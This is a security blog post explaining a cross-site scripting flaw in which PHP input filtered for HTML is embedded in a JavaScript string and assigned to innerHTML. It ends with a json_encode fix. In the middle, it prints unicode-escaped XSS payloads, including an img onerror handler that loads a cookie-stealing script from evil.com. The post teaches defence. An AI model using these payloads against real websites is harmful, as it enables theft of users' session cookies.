[philiptellis] /bb|[^b]{2}/
Never stop Grokking


Thursday, January 20, 2011

Sometimes you need to wash twice

When conversing across languages, informations is sometimes lost in translation.

The problem I'll talk about today deals with the different ways in which quotes can be represented in different contexts, in particular, when passing data across language boundaries. Let's look at some code.
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = "<?php echo $s; ?>";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
From the HTML perpective, this code appears clean. Data from the URL parameter s needs to be written out to HTML and we're applying a suitable filter to it to make it safe for use in that context. This code would be fine if we were passing the data directly from PHP to HTML, but that's not what we're doing here.

Testing this code out with the usual suspects — <>&"' — shows that it's safe. You can neither insert HTML into the div, nor can you insert JavaScript by getting out of the quotes since all quotes in the input data are converted to &#34;

It seems that the worst that we can do here is to break the JavaScript by throwing a \ into the end of s. The output of our PHP becomes:
<script>
   var s = "...\";

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The result is that our JavaScript terminates with an error after line 1, and that's the end of it... but maybe not.

The \ gives us a clue. In JavaScript, all characters are unicode, and we can represent any character by its unicode equivalent using the \u<codepoint>. This still doesn't help us get out of the quotes in JavaScript, but it does mess around with the innerHTML.

What we're doing in the innerHTML assignment is assigning a string to a div's innerHTML property, and then the browser goes ahead and renders that string as if it were HTML. In essence, innerHTML is to HTML what eval() is to JavaScript and PHP — a bad idea.

We can now craft a string made completely using the unicode escape sequences for JavaScript. For example, \u003cscript+src\u003d\u0022http://evil.com/cookie-steal.js\u0022\u003e\u003c/script\u003e

When assigned to the innerHTML, it turns into the following HTML:
<script src="http://evil.com/cookie-steal.js"></script>
Fortunately, browsers won't execute script nodes that were added using innerHTML. They will, however execute inline events on elements added through innerHTML, so we do this instead:
\u003cimg+src\u003dblah+onerror\u003d\u0022s=document.createElement(\u0027script\u0027);s.src\u003d\u0027http://evil.com/cookie-steal.js\u0027;document.body.appendChild(s);\u0022\u003e, which translates to the following HTML (indented for readability):
<img src=blah
   onerror="s=document.createElement('script');
            s.src='http://...';
            document.body.appendChild(s);">
The JavaScript fires in most cases. To get it to fire in all cases, you also need to attach to the onload event.

So, what's the fix here?

To think about the fix, we need to think about context, and every place this user data is being used. Depending on the actual use case, our fix may involve just one change, or several changes to the above code. One change is mandatory though:
<?php
   $s = filter_var($_GET['s'], FILTER_SANITIZE_SPECIAL_CHARS);
?>
<script>
   var s = <?php echo json_encode($s); ?>

   var div = document.getElementById("content");
   div.innerHTML = s;
</script>
The json_encode function returns a quoted JavaScript string. It correctly escapes all characters within that string that are special to JavaScript, so in our case, \u00xx turns into \\u00xx. Note that addslashes is insufficient as it does not escape newline characters which are valid inside PHP strings.

Two things to learn from this:
  1. When passing untrusted data across language boundaries, you may need to sanitize it multiple times
  2. innerHTML is the eval of HTML

0 comments :

Post a Comment

...===...